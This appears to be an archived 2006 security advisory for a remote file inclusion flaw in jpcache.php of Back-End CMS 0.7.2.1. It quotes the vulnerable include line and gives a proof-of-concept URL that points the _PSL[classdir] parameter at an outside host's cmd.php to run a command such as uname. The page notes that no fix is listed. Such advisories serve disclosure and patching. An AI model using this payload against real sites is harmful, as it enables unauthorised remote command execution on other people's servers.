Back-End CMS <= 0.7.2.1 (jpcache.php) Remote Include Vulnerability

2006-06-08 00:00:00

# Federico Fazzi, <[email protected]>
# Back-end = 0.7.2.1 (jpcache.php) Remote command execution
# 08/06/2006 1:04
# Bug:
#
# jpcache.php: line 40
#
# ---
# $includedir = $_PSL['classdir'] . "/jpcache";
# ---
#
# Proof of concept:
#
# Back-end have a default path pre-set on jpcache.php,
# and cracker can execute a remote command.
#
# http://example/[be_path]/class/jpcache/jpcache.php?_PSL[classdir]=http://example/cmd.php?exec=uname

#

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.